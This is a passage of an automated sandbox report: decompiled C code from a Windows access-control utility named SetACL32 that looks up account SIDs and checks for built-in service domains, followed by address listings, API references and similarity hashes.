								L47:
								__eflags = _t478;
								if(_t478 == 0) {
									L51:
									 *[fs:0x0] = _v16;
									return _t333;
								} else {
									_t214 = _t478;
									_t365 = _v56 - _t478;
									__eflags = _t365 - 0x1000;
									if(_t365 < 0x1000) {
										L50:
										_push(_t365);
										E012CAE27(_t478);
										goto L51;
									} else {
										_t478 =  *(_t478 - 4);
										_t365 =  &(_t365[0x11]);
										__eflags = _t214 - _t478 + 0xfffffffc - 0x1f;
										if(__eflags > 0) {
											goto L55;
										} else {
											goto L50;
										}
									}
								}
							} else {
								_t307 = _t361;
								_t463 = _t463 - _t361 & 0xfffffffe;
								__eflags = _t463 - 0x1000;
								if(_t463 < 0x1000) {
									L46:
									_push(_t463);
									E012CAE27(_t361);
									_t501 = _t501 + 8;
									goto L47;
								} else {
									_t365 =  *(_t361 - 4);
									_t463 = _t463 + 0x23;
									__eflags = _t307 - _t365 + 0xfffffffc - 0x1f;
									if(__eflags > 0) {
										goto L55;
									} else {
										goto L46;
									}
								}
							}
						} else {
							__eflags = _t355 - 0x7fffffff;
							if(_t355 > 0x7fffffff) {
								goto L54;
							} else {
								_push(_t355);
								_t322 = E012A1E80(_t333, 0, 0, _t478);
								_t429 = _v32 + _v32;
								__eflags = _t429;
								_v52 = _t322;
								_t463 = _t429 + _t322;
								_v44 = _t463;
								E012CCDE0(_t463, _t322, 0, _t429);
								_t324 = _v52;
								_t501 = _t501 + 0xc;
								_v48 = _t463;
								_t436 = _t324;
								_v28 = _t324;
								goto L21;
							}
						}
					} else {
						__eflags = _t207 - 0x7fffffff;
						if(_t207 > 0x7fffffff) {
							E0129CEE0(_t333, _t436, 0);
							goto L53;
						} else {
							__eflags = _t207 - 0x1000;
							if(__eflags < 0) {
								_push(_t207);
								_t327 = E012CAE5D(_t333, 0, 0, __eflags);
								_t513 = _t501 + 4;
								_t478 = _t327;
								L17:
								_t474 = _t478 + _v28;
								_v64 = _t478;
								_v56 = _t474;
								E012CCDE0(_t474, _t478, 0, _v28);
								_t501 = _t513 + 0xc;
								_v60 = _t474;
								goto L18;
							} else {
								_t365 = _t207 + 0x23;
								__eflags = _t365 - _t207;
								if(__eflags <= 0) {
									L53:
									E012A1E60(_t333, _t436, _t463, _t478);
									L54:
									E0129CEE0(_t333, _t436, _t478);
									goto L55;
								} else {
									_push(_t365);
									_t330 = E012CAE5D(_t333, 0, 0, __eflags);
									_t501 = _t501 + 4;
									__eflags = _t330;
									if(__eflags == 0) {
										L55:
										E012CF35F(_t333, _t365, _t436, __eflags);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t498 = _t501;
										_push(0xffffffff);
										_push(0x12ecd65);
										_push( *[fs:0x0]);
										_t503 = _t501 - 0x7c;
										_t220 =  *0x1309018; // 0xedd8d3b4
										_t221 = _t220 ^ _t498;
										_v100 = _t221;
										_push(_t333);
										_push(_t478);
										_push(_t463);
										_push(_t221);
										 *[fs:0x0] =  &_v96;
										_t480 = _t436;
										_v156 = _t480;
										_t337 = _t365;
										_v208 = _t337;
										_t366 = _v68;
										_t465 = _v64;
										_v176 = _v76;
										_v152 = _t465;
										_v172 = _v72;
										_v160 = _t366;
										_v168 = 0;
										_v164 = 0;
										__eflags = _t366;
										if(_t366 != 0) {
											 *_t366 = 8;
											__eflags = _t465;
											if(_t465 == 0) {
												L71:
												__eflags = _t337[8];
												if(_t337[8] != 0) {
													__eflags = _t337[0xa] - 8;
													_t225 = _t337;
													if(_t337[0xa] >= 8) {
														_t225 =  *_t337;
													}
												} else {
													_t225 = 0;
												}
												_t226 = LookupAccountSidW(_t225,  *_t480, 0,  &_v92, 0,  &_v88, _t366);
												__eflags = _t226;
												if(_t226 != 0) {
													L78:
													_t481 = _v92;
													_t338 = 0;
													_t466 = 0;
													_v128 = 0;
													_v124 = 0;
													_v120 = 0;
													__eflags = _t481;
													if(_t481 == 0) {
														L81:
														_v12 = 0;
														_t481 = 0;
														_t227 = _v88;
														_v136 = _t227;
														_v116 = 0;
														_v112 = 0;
														_v108 = 0;
														_v104 = 0;
														__eflags = _t227;
														if(_t227 == 0) {
															L84:
															_v12 = 1;
															_t369 =  *_v80;
															_t229 = _v132;
															__eflags = _t229[8];
															if(_t229[8] != 0) {
																__eflags = _t229[0xa] - 8;
																if(_t229[0xa] >= 8) {
																	_t229 =  *_t229;
																}
															} else {
																_t229 = 0;
															}
															_t440 =  &_v92;
															_t230 = LookupAccountSidW(_t229, _t369, _t338,  &_v92, _t481,  &_v88, _v84);
															__eflags = _t230;
															if(_t230 != 0) {
																_t370 = _t338;
																_t129 =  &(_t370[1]); // 0x2
																_t441 = _t129;
																do {
																	_t231 =  *_t370;
																	_t370 =  &(_t370[1]);
																	__eflags = _t231;
																} while (_t231 != 0);
																__eflags = _t370 - _t441;
																E012A1EE0(_t338, _v100, _t441, _t466, _t481, _t338, _t370 - _t441 >> 1);
																_t374 = _t481;
																_t131 =  &(_t374[1]); // 0x2
																_t440 = _t131;
																do {
																	_t233 =  *_t374;
																	_t374 =  &(_t374[1]);
																	__eflags = _t233;
																} while (_t233 != 0);
																_t369 = _v96;
																E012A1EE0(_t338, _t369, _t440, _t466, _t481, _t481, _t374 - _t440 >> 1);
																__eflags = _v76;
																if(_v76 != 0) {
																	E012983B0( &_v72, _v96);
																	_v12 = 2;
																	E012983B0( &_v48, _v100);
																	_v12 = 3;
																	_t492 = E012C95F0(__eflags, _v80);
																	E012982B0(_t338, _t492,  &_v72);
																	_t144 = _t492 + 0x18; // 0x18
																	E012982B0(_t338, _t144,  &_v48);
																	_t369 =  &_v72;
																	E012A6F20(_t338, _t369, _t492);
																	_t481 = _v104;
																}
																_v76 = 0;
															} else {
																_v76 = GetLastError();
															}
															__eflags = _t481;
															if(_t481 == 0) {
																L102:
																__eflags = _t338;
																if(_t338 == 0) {
																	L106:
																	_t235 = _v76;
																	goto L107;
																} else {
																	_t237 = _t338;
																	_t469 = _t466 - _t338 & 0xfffffffe;
																	__eflags = _t469 - 0x1000;
																	if(_t469 < 0x1000) {
																		L105:
																		_push(_t469);
																		E012CAE27(_t338);
																		goto L106;
																	} else {
																		_t338 =  *(_t338 - 4);
																		_t469 = _t469 + 0x23;
																		__eflags = _t237 - _t338 + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L110;
																		} else {
																			goto L105;
																		}
																	}
																}
															} else {
																_t369 = _v108 - _t481 & 0xfffffffe;
																__eflags = _t369 - 0x1000;
																if(_t369 < 0x1000) {
																	L101:
																	_push(_t369);
																	E012CAE27(_t481);
																	_t503 = _t503 + 8;
																	goto L102;
																} else {
																	_t440 =  *(_t481 - 4);
																	_t369 = _t369 + 0x23;
																	_t481 = _t481 - _t440;
																	_t150 = _t481 - 4; // -4
																	__eflags = _t150 - 0x1f;
																	if(__eflags > 0) {
																		goto L110;
																	} else {
																		_t481 = _t440;
																		goto L101;
																	}
																}
															}
														} else {
															__eflags = _t227 - 0x7fffffff;
															if(_t227 > 0x7fffffff) {
																goto L109;
															} else {
																_push(_t227);
																_t295 = E012A1E80(_t338, _t436, _t466, 0);
																_t421 = _v136 + _v136;
																__eflags = _t421;
																_v104 = _t295;
																_t493 = _t295 + _t421;
																_v116 = _t295;
																_v108 = _t493;
																E012CCDE0(_t466, _t295, 0, _t421);
																_v112 = _t493;
																_t503 = _t503 + 0xc;
																_t481 = _v104;
																goto L84;
															}
														}
													} else {
														__eflags = _t481 - 0x7fffffff;
														if(_t481 > 0x7fffffff) {
															E0129CEE0(0, _t436, _t481);
															L109:
															E0129CEE0(_t338, _t436, _t481);
															L110:
															E012CF35F(_t338, _t369, _t440, __eflags);
															asm("int3");
															asm("int3");
															_push(_t498);
															_push(0xffffffff);
															_push(0x12ecdcd);
															_push( *[fs:0x0]);
															_push(_t338);
															_push(_t481);
															_push(_t469);
															_t243 =  *0x1309018; // 0xedd8d3b4
															_push(_t243 ^ _t503);
															 *[fs:0x0] =  &_v252;
															_t470 = _t369;
															_push(1);
															_v244 = 0;
															_t483 = E012C9DCB(_t338, _t369, _t481, __eflags);
															_v256 = _t483;
															_v244 = 1;
															_push( &_v260);
															_t248 = E01298900(_t369, L"NT AUTHORITY");
															_v244 = 0xffffffff;
															_t340 = _t248;
															__eflags = _t483;
															if(_t483 != 0) {
																_t281 =  *((intOrPtr*)( *_t483 + 8))();
																__eflags = _t281;
																if(_t281 != 0) {
																	 *((intOrPtr*)( *((intOrPtr*)( *_t281))))(1);
																}
															}
															__eflags = _t340;
															if(__eflags != 0) {
																L140:
																 *[fs:0x0] = _v24;
																return 1;
															} else {
																_push(1);
																_v16 = 2;
																_t485 = E012C9DCB(_t340, _t470, _t483, __eflags);
																_v28 = _t485;
																_v16 = 3;
																_push( &_v32);
																_t252 = E01298900(_t470, L"NT SERVICE");
																_v16 = 0xffffffff;
																_t342 = _t252;
																__eflags = _t485;
																if(_t485 != 0) {
																	_t279 =  *((intOrPtr*)( *_t485 + 8))();
																	__eflags = _t279;
																	if(_t279 != 0) {
																		 *((intOrPtr*)( *((intOrPtr*)( *_t279))))(1);
																	}
																}
																__eflags = _t342;
																if(__eflags != 0) {
																	goto L140;
																} else {
																	_push(1);
																	_v16 = 4;
																	_t486 = E012C9DCB(_t342, _t470, _t485, __eflags);
																	_v28 = _t486;
																	_v16 = 5;
																	_t255 = E012C9610(_t470,  &_v32);
																	_v16 = 0xffffffff;
																	_t343 = _t255;
																	__eflags = _t486;
																	if(_t486 != 0) {
																		_t277 =  *((intOrPtr*)( *_t486 + 8))();
																		__eflags = _t277;
																		if(_t277 != 0) {
																			 *((intOrPtr*)( *((intOrPtr*)( *_t277))))(1);
																		}
																	}
																	__eflags = _t343;
																	if(__eflags != 0) {
																		goto L140;
																	} else {
																		_push(1);
																		_v16 = 6;
																		_t487 = E012C9DCB(_t343, _t470, _t486, __eflags);
																		_v28 = _t487;
																		_v16 = 7;
																		_push( &_v32);
																		_t258 = E01298900(_t470, L"NT VIRTUAL MACHINE");
																		_v16 = 0xffffffff;
																		_t344 = _t258;
																		__eflags = _t487;
																		if(_t487 != 0) {
																			_t275 =  *((intOrPtr*)( *_t487 + 8))();
																			__eflags = _t275;
																			if(_t275 != 0) {
																				 *((intOrPtr*)( *((intOrPtr*)( *_t275))))(1);
																			}
																		}
																		__eflags = _t344;
																		if(__eflags != 0) {
																			goto L140;
																		} else {
																			_push(1);
																			_v16 = 8;
																			_t488 = E012C9DCB(_t344, _t470, _t487, __eflags);
																			_v28 = _t488;
																			_v16 = 9;
																			_push( &_v32);
																			_t261 = E01298900(_t470, L"IIS AppPool");
																			_v16 = 0xffffffff;
																			_t345 = _t261;
																			__eflags = _t488;
																			if(_t488 != 0) {
																				_t273 =  *((intOrPtr*)( *_t488 + 8))();
																				__eflags = _t273;
																				if(_t273 != 0) {
																					 *((intOrPtr*)( *((intOrPtr*)( *_t273))))(1);
																				}
																			}
																			__eflags = _t345;
																			if(__eflags != 0) {
																				goto L140;
																			} else {
																				_push(1);
																				_v16 = 0xa;
																				_t489 = E012C9DCB(_t345, _t470, _t488, __eflags);
																				_v28 = _t489;
																				_v16 = 0xb;
																				_push( &_v32);
																				_t264 = E01298900(_t470, L"WINDOW MANAGER");
																				_v16 = 0xffffffff;
																				_t346 = _t264;
																				__eflags = _t489;
																				if(_t489 != 0) {
																					_t271 =  *((intOrPtr*)( *_t489 + 8))();
																					__eflags = _t271;
																					if(_t271 != 0) {
																						 *((intOrPtr*)( *((intOrPtr*)( *_t271))))(1);
																					}
																				}
																				__eflags = _t346;
																				if(__eflags != 0) {
																					goto L140;
																				} else {
																					_push(1);
																					_v16 = 0xc;
																					_t490 = E012C9DCB(_t346, _t470, _t489, __eflags);
																					_v28 = _t490;
																					_v16 = 0xd;
																					_push( &_v32);
																					_t347 = E01298900(_t470, L"Font Driver Host");
																					__eflags = _t490;
																					if(_t490 != 0) {
																						_t269 =  *((intOrPtr*)( *_t490 + 8))();
																						__eflags = _t269;
																						if(_t269 != 0) {
																							 *((intOrPtr*)( *_t269))(1);
																						}
																					}
																					__eflags = _t347;
																					if(_t347 != 0) {
																						goto L140;
																					} else {
																						__eflags = 0;
																						 *[fs:0x0] = _v24;
																						return 0;
																					}
																				}
																			}
																		}
																	}
																}
															}
														} else {
															_push(_t481);
															_t338 = E012A1E80(0, _t436, 0, _t481);
															_t369 = _t481 + _t481;
															_t466 = _t338 + _t369;
															_v128 = _t338;
															_v120 = _t466;
															E012CCDE0(_t466, _t338, 0, _t369);
															_t503 = _t503 + 0xc;
															_v124 = _t466;
															goto L81;
														}
													}
												} else {
													_t235 = GetLastError();
													__eflags = _t235 - 0xea;
													if(_t235 == 0xea) {
														goto L78;
													} else {
														__eflags = _t235 - 0x7a;
														if(_t235 != 0x7a) {
															goto L107;
														} else {
															goto L78;
														}
													}
												}
											} else {
												_t494 =  *(E012C9B70(_t465,  &_v140, _t480, E012C8BB0(_t480)) + 4);
												__eflags = _t494;
												if(_t494 == 0) {
													L70:
													_t480 = _v80;
													_t366 = _v84;
													goto L71;
												} else {
													__eflags = _t494 -  *((intOrPtr*)(_t465 + 4));
													if(_t494 ==  *((intOrPtr*)(_t465 + 4))) {
														goto L70;
													} else {
														_t440 = _v96;
														_t303 = _t494 + 0xc;
														__eflags = _t440 - _t303;
														if(_t440 != _t303) {
															__eflags =  *((intOrPtr*)(_t303 + 0x14)) - 8;
															_t425 =  *((intOrPtr*)(_t303 + 0x10));
															if( *((intOrPtr*)(_t303 + 0x14)) >= 8) {
																_t303 =  *_t303;
															}
															E012A1EE0(_t337, _t440, _t440, _t465, _t494, _t303, _t425);
														}
														_t424 = _v100;
														_t304 = _t494 + 0x24;
														__eflags = _v100 - _t304;
														if(_v100 != _t304) {
															__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 8;
															_t440 =  *(_t304 + 0x10);
															if( *((intOrPtr*)(_t304 + 0x14)) >= 8) {
																_t304 =  *_t304;
															}
															E012A1EE0(_t337, _t424, _t440, _t465, _t494, _t304, _t440);
														}
														_t235 = 0;
														goto L107;
													}
												}
											}
										} else {
											_t235 = _t366 + 0x57;
											L107:
											 *[fs:0x0] = _v20;
											_pop(_t467);
											_pop(_t482);
											_pop(_t339);
											__eflags = _v24 ^ _t498;
											return E012CAE19(_t235, _t339, _v24 ^ _t498, _t440, _t467, _t482);
										}
									} else {
										_t21 = _t330 + 0x23; // 0x23
										_t478 = _t21 & 0xffffffe0;
										 *(_t478 - 4) = _t330;
										goto L17;
									}
								}
							}
						}
					}
				} else {
					_t331 = GetLastError();
					 *[fs:0x0] = _v16;
					return _t331;
				}
			}





















































































































































              0x012c8d33
              0x012c8d35
              0x012c8d40
              0x012c8d41
              0x012c8d47
              0x012c8d4e
              0x012c8d52
              0x012c8d58
              0x012c8d5a
              0x012c8d5d
              0x012c8d5f
              0x012c8d62
              0x012c8d68
              0x012c8d6a
              0x012c8d6a
              0x012c8d6c
              0x012c8d75
              0x012c8d7c
              0x012c8d7f
              0x012c8d82
              0x012c8d84
              0x012c8d86
              0x012c8d86
              0x012c8d8c
              0x012c8d92
              0x012c8d96
              0x012c8d98
              0x012c8d9a
              0x012c8d9a
              0x012c8d8e
              0x012c8d8e
              0x012c8d8e
              0x012c8da6
              0x012c8dae
              0x012c8dbf
              0x012c8dd5
              0x012c8dd8
              0x012c8dda
              0x012c8ddc
              0x012c8ddf
              0x012c8de2
              0x012c8de5
              0x012c8de8
              0x012c8dea
              0x012c8e4b
              0x012c8e4b
              0x012c8e54
              0x012c8e57
              0x012c8e59
              0x012c8e5b
              0x012c8e5e
              0x012c8e61
              0x012c8e64
              0x012c8e67
              0x012c8e6a
              0x012c8e6c
              0x012c8ea8
              0x012c8ea8
              0x012c8eab
              0x012c8eaf
              0x012c8eb3
              0x012c8eb5
              0x012c8eb5
              0x012c8eb7
              0x012c8ebb
              0x012c8ec1
              0x012c8ec5
              0x012c8ec7
              0x012c8ec7
              0x012c8ebd
              0x012c8ebd
              0x012c8ebd
              0x012c8ed9
              0x012c8edf
              0x012c8ee1
              0x012c8ef0
              0x012c8ef3
              0x012c8ef5
              0x012c8ef5
              0x012c8f00
              0x012c8f00
              0x012c8f03
              0x012c8f06
              0x012c8f06
              0x012c8f0d
              0x012c8f14
              0x012c8f19
              0x012c8f1c
              0x012c8f1e
              0x012c8f20
              0x012c8f22
              0x012c8f25
              0x012c8f2b
              0x012c8f2d
              0x012c8f2f
              0x012c8f31
              0x012c8f33
              0x012c8f36
              0x012c8f3b
              0x012c8f3e
              0x012c8f3e
              0x012c8f45
              0x012c8f4b
              0x012c8f4d
              0x012c8f82
              0x012c8f82
              0x012c8f82
              0x012c8f4f
              0x012c8f50
              0x012c8f56
              0x012c8f58
              0x012c8f59
              0x012c8f61
              0x012c8f63
              0x012c8f66
              0x012c8f68
              0x00000000
              0x012c8f6a
              0x012c8f6f
              0x012c8f75
              0x012c8f77
              0x012c8f7a
              0x012c8f7f
              0x00000000
              0x012c8f7f
              0x012c8f77
              0x012c8f68
              0x012c8f87
              0x012c8f87
              0x012c8f2d
              0x012c8f22
              0x012c8f89
              0x012c8f89
              0x012c8ee3
              0x012c8ee9
              0x012c8ee9
              0x012c8f8b
              0x012c8f8e
              0x012c8f90
              0x012c8fbb
              0x012c8fbb
              0x012c8fbd
              0x012c8fe8
              0x012c8fed
              0x012c8ffb
              0x012c8fbf
              0x012c8fc2
              0x012c8fc4
              0x012c8fc6
              0x012c8fcc
              0x012c8fde
              0x012c8fde
              0x012c8fe0
              0x00000000
              0x012c8fce
              0x012c8fce
              0x012c8fd1
              0x012c8fd9
              0x012c8fdc
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c8fdc
              0x012c8fcc
              0x012c8f92
              0x012c8f94
              0x012c8f96
              0x012c8f99
              0x012c8f9f
              0x012c8fb1
              0x012c8fb1
              0x012c8fb3
              0x012c8fb8
              0x00000000
              0x012c8fa1
              0x012c8fa1
              0x012c8fa4
              0x012c8fac
              0x012c8faf
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c8faf
              0x012c8f9f
              0x012c8e6e
              0x012c8e6e
              0x012c8e74
              0x00000000
              0x012c8e7a
              0x012c8e7a
              0x012c8e7e
              0x012c8e86
              0x012c8e86
              0x012c8e88
              0x012c8e8f
              0x012c8e92
              0x012c8e95
              0x012c8e9a
              0x012c8e9d
              0x012c8ea0
              0x012c8ea3
              0x012c8ea5
              0x00000000
              0x012c8ea5
              0x012c8e74
              0x012c8dec
              0x012c8dec
              0x012c8df1
              0x012c8ffc
              0x00000000
              0x012c8df7
              0x012c8df7
              0x012c8dfc
              0x012c8e25
              0x012c8e26
              0x012c8e2b
              0x012c8e2e
              0x012c8e30
              0x012c8e37
              0x012c8e3a
              0x012c8e3d
              0x012c8e40
              0x012c8e45
              0x012c8e48
              0x00000000
              0x012c8dfe
              0x012c8dfe
              0x012c8e01
              0x012c8e03
              0x012c9001
              0x012c9001
              0x012c9006
              0x012c9006
              0x00000000
              0x012c8e09
              0x012c8e09
              0x012c8e0a
              0x012c8e0f
              0x012c8e12
              0x012c8e14
              0x012c900b
              0x012c900b
              0x012c9010
              0x012c9011
              0x012c9012
              0x012c9013
              0x012c9014
              0x012c9015
              0x012c9016
              0x012c9017
              0x012c9018
              0x012c9019
              0x012c901a
              0x012c901b
              0x012c901c
              0x012c901d
              0x012c901e
              0x012c901f
              0x012c9021
              0x012c9023
              0x012c9025
              0x012c9030
              0x012c9031
              0x012c9034
              0x012c9039
              0x012c903b
              0x012c903e
              0x012c903f
              0x012c9040
              0x012c9041
              0x012c9045
              0x012c904b
              0x012c904d
              0x012c9050
              0x012c9052
              0x012c9058
              0x012c905b
              0x012c905e
              0x012c9064
              0x012c9067
              0x012c906a
              0x012c906d
              0x012c9074
              0x012c907b
              0x012c907d
              0x012c9087
              0x012c908d
              0x012c908f
              0x012c90fa
              0x012c90fa
              0x012c90fe
              0x012c9104
              0x012c9108
              0x012c910a
              0x012c910c
              0x012c910c
              0x012c9100
              0x012c9100
              0x012c9100
              0x012c911e
              0x012c9124
              0x012c9126
              0x012c913e
              0x012c913e
              0x012c9141
              0x012c9143
              0x012c9145
              0x012c9148
              0x012c914b
              0x012c914e
              0x012c9150
              0x012c9184
              0x012c9184
              0x012c918b
              0x012c918d
              0x012c9190
              0x012c9193
              0x012c919a
              0x012c91a1
              0x012c91a4
              0x012c91a7
              0x012c91a9
              0x012c91e2
              0x012c91e5
              0x012c91e9
              0x012c91eb
              0x012c91ee
              0x012c91f2
              0x012c91f8
              0x012c91fc
              0x012c91fe
              0x012c91fe
              0x012c91f4
              0x012c91f4
              0x012c91f4
              0x012c9208
              0x012c920f
              0x012c9215
              0x012c9217
              0x012c9227
              0x012c9229
              0x012c9229
              0x012c9230
              0x012c9230
              0x012c9233
              0x012c9236
              0x012c9236
              0x012c923b
              0x012c9244
              0x012c9249
              0x012c924b
              0x012c924b
              0x012c9250
              0x012c9250
              0x012c9253
              0x012c9256
              0x012c9256
              0x012c9260
              0x012c9264
              0x012c9269
              0x012c926d
              0x012c9275
              0x012c9280
              0x012c9284
              0x012c928f
              0x012c9298
              0x012c92a0
              0x012c92a9
              0x012c92ac
              0x012c92b1
              0x012c92b4
              0x012c92b9
              0x012c92b9
              0x012c92bc
              0x012c9219
              0x012c921f
              0x012c921f
              0x012c92c3
              0x012c92c5
              0x012c92f3
              0x012c92f3
              0x012c92f5
              0x012c9320
              0x012c9320
              0x00000000
              0x012c92f7
              0x012c92f9
              0x012c92fb
              0x012c92fe
              0x012c9304
              0x012c9316
              0x012c9316
              0x012c9318
              0x00000000
              0x012c9306
              0x012c9306
              0x012c9309
              0x012c9311
              0x012c9314
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c9314
              0x012c9304
              0x012c92c7
              0x012c92cc
              0x012c92cf
              0x012c92d5
              0x012c92e9
              0x012c92e9
              0x012c92eb
              0x012c92f0
              0x00000000
              0x012c92d7
              0x012c92d7
              0x012c92da
              0x012c92dd
              0x012c92df
              0x012c92e2
              0x012c92e5
              0x00000000
              0x012c92e7
              0x012c92e7
              0x00000000
              0x012c92e7
              0x012c92e5
              0x012c92d5
              0x012c91ab
              0x012c91ab
              0x012c91b0
              0x00000000
              0x012c91b6
              0x012c91b6
              0x012c91ba
              0x012c91c2
              0x012c91c2
              0x012c91c4
              0x012c91cb
              0x012c91ce
              0x012c91d1
              0x012c91d4
              0x012c91d9
              0x012c91dc
              0x012c91df
              0x00000000
              0x012c91df
              0x012c91b0
              0x012c9152
              0x012c9152
              0x012c9158
              0x012c933f
              0x012c9344
              0x012c9344
              0x012c9349
              0x012c9349
              0x012c934e
              0x012c934f
              0x012c9350
              0x012c9353
              0x012c9355
              0x012c9360
              0x012c9364
              0x012c9365
              0x012c9366
              0x012c9367
              0x012c936e
              0x012c9372
              0x012c9378
              0x012c937a
              0x012c937c
              0x012c9388
              0x012c938a
              0x012c9390
              0x012c9397
              0x012c939f
              0x012c93a7
              0x012c93ae
              0x012c93b0
              0x012c93b2
              0x012c93b8
              0x012c93bb
              0x012c93bd
              0x012c93c7
              0x012c93c7
              0x012c93bd
              0x012c93c9
              0x012c93cb
              0x012c95d9
              0x012c95de
              0x012c95ec
              0x012c93d1
              0x012c93d1
              0x012c93d3
              0x012c93df
              0x012c93e1
              0x012c93e7
              0x012c93ee
              0x012c93f6
              0x012c93fe
              0x012c9405
              0x012c9407
              0x012c9409
              0x012c940f
              0x012c9412
              0x012c9414
              0x012c941e
              0x012c941e
              0x012c9414
              0x012c9420
              0x012c9422
              0x00000000
              0x012c9428
              0x012c9428
              0x012c942a
              0x012c9436
              0x012c9438
              0x012c943e
              0x012c9448
              0x012c9450
              0x012c9457
              0x012c9459
              0x012c945b
              0x012c9461
              0x012c9464
              0x012c9466
              0x012c9470
              0x012c9470
              0x012c9466
              0x012c9472
              0x012c9474
              0x00000000
              0x012c947a
              0x012c947a
              0x012c947c
              0x012c9488
              0x012c948a
              0x012c9490
              0x012c9497
              0x012c949f
              0x012c94a7
              0x012c94ae
              0x012c94b0
              0x012c94b2
              0x012c94b8
              0x012c94bb
              0x012c94bd
              0x012c94c7
              0x012c94c7
              0x012c94bd
              0x012c94c9
              0x012c94cb
              0x00000000
              0x012c94d1
              0x012c94d1
              0x012c94d3
              0x012c94df
              0x012c94e1
              0x012c94e7
              0x012c94ee
              0x012c94f6
              0x012c94fe
              0x012c9505
              0x012c9507
              0x012c9509
              0x012c950f
              0x012c9512
              0x012c9514
              0x012c951e
              0x012c951e
              0x012c9514
              0x012c9520
              0x012c9522
              0x00000000
              0x012c9528
              0x012c9528
              0x012c952a
              0x012c9536
              0x012c9538
              0x012c953e
              0x012c9545
              0x012c954d
              0x012c9555
              0x012c955c
              0x012c955e
              0x012c9560
              0x012c9566
              0x012c9569
              0x012c956b
              0x012c9575
              0x012c9575
              0x012c956b
              0x012c9577
              0x012c9579
              0x00000000
              0x012c957b
              0x012c957b
              0x012c957d
              0x012c9589
              0x012c958b
              0x012c9591
              0x012c9598
              0x012c95a8
              0x012c95aa
              0x012c95ac
              0x012c95b2
              0x012c95b5
              0x012c95b7
              0x012c95bf
              0x012c95bf
              0x012c95b7
              0x012c95c1
              0x012c95c3
              0x00000000
              0x012c95c5
              0x012c95c5
              0x012c95ca
              0x012c95d8
              0x012c95d8
              0x012c95c3
              0x012c9579
              0x012c9522
              0x012c94cb
              0x012c9474
              0x012c9422
              0x012c915e
              0x012c915e
              0x012c9167
              0x012c9169
              0x012c9170
              0x012c9173
              0x012c9176
              0x012c9179
              0x012c917e
              0x012c9181
              0x00000000
              0x012c9181
              0x012c9158
              0x012c9128
              0x012c9128
              0x012c912e
              0x012c9133
              0x00000000
              0x012c9135
              0x012c9135
              0x012c9138
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012c9138
              0x012c9133
              0x012c9091
              0x012c90a7
              0x012c90aa
              0x012c90ac
              0x012c90f4
              0x012c90f4
              0x012c90f7
              0x00000000
              0x012c90ae
              0x012c90ae
              0x012c90b1
              0x00000000
              0x012c90b3
              0x012c90b3
              0x012c90b6
              0x012c90b9
              0x012c90bb
              0x012c90bd
              0x012c90c1
              0x012c90c4
              0x012c90c6
              0x012c90c6
              0x012c90cc
              0x012c90cc
              0x012c90d1
              0x012c90d4
              0x012c90d7
              0x012c90d9
              0x012c90db
              0x012c90df
              0x012c90e2
              0x012c90e4
              0x012c90e4
              0x012c90e8
              0x012c90e8
              0x012c90ed
              0x00000000
              0x012c90ed
              0x012c90b1
              0x012c90ac
              0x012c907f
              0x012c907f
              0x012c9323
              0x012c9326
              0x012c932e
              0x012c932f
              0x012c9330
              0x012c9334
              0x012c933e
              0x012c933e
              0x012c8e1a
              0x012c8e1a
              0x012c8e1d
              0x012c8e20
              0x00000000
              0x012c8e20
              0x012c8e14
              0x012c8e03
              0x012c8dfc
              0x012c8df1
              0x012c8dc1
              0x012c8dc1
              0x012c8dc6
              0x012c8dd4
              0x012c8dd4

              APIs
              • LookupAccountNameW.ADVAPI32(00000000,012FC3E4,00000000,?,00000000,012C7EBC,?), ref: 012C8DAE
              • GetLastError.KERNEL32(?,?,?,?,00000000,012ECD15,000000FF,?,012C7EBC,00000000,?), ref: 012C8DBA
              • GetLastError.KERNEL32(?,?,?,?,00000000,012ECD15,000000FF,?,012C7EBC,00000000,?), ref: 012C8DC1
              • LookupAccountNameW.ADVAPI32(00000000,00000000,00000000,?,00000000,012C7EBC,?), ref: 012C8ED9
              • GetLastError.KERNEL32(?,?,?,?,00000000,012ECD15,000000FF,?,012C7EBC,00000000,?), ref: 012C8EE3
              • IsValidSid.ADVAPI32(00000000,000000FF,000000FD,?,?,?,?,00000000,012ECD15,000000FF,?,012C7EBC,00000000,?), ref: 012C8F25
              • IsValidSid.ADVAPI32(00000000,?,?,?,?,00000000,012ECD15,000000FF,?,012C7EBC,00000000,?), ref: 012C8F45
              • GetLengthSid.ADVAPI32(00000000,?,?,?,?,00000000,012ECD15,000000FF,?,012C7EBC,00000000,?), ref: 012C8F50
              • Concurrency::cancel_current_task.LIBCPMT ref: 012C9001
              • CopySid.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,00000000,012ECD15,000000FF,?,012C7EBC,00000000,?), ref: 012C8F6F
                • Part of subcall function 0129CEE0: std::_Xinvalid_argument.LIBCPMT ref: 0129CEE5
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorLast$AccountLookupNameValid$Concurrency::cancel_current_taskCopyLengthXinvalid_argumentstd::_
              • String ID: @Mhv
              • API String ID: 2924040691-3595611156
              • Opcode ID: b2f3512a0a7b3804a8c886e94cf5f4022d47b5c18462b832bd012ff518a6cc4b
              • Instruction ID: 934288c357ff80efa1f252cf8075c9ee36e40d81d92eeeee1227eda80800f6e2
              • Opcode Fuzzy Hash: b2f3512a0a7b3804a8c886e94cf5f4022d47b5c18462b832bd012ff518a6cc4b
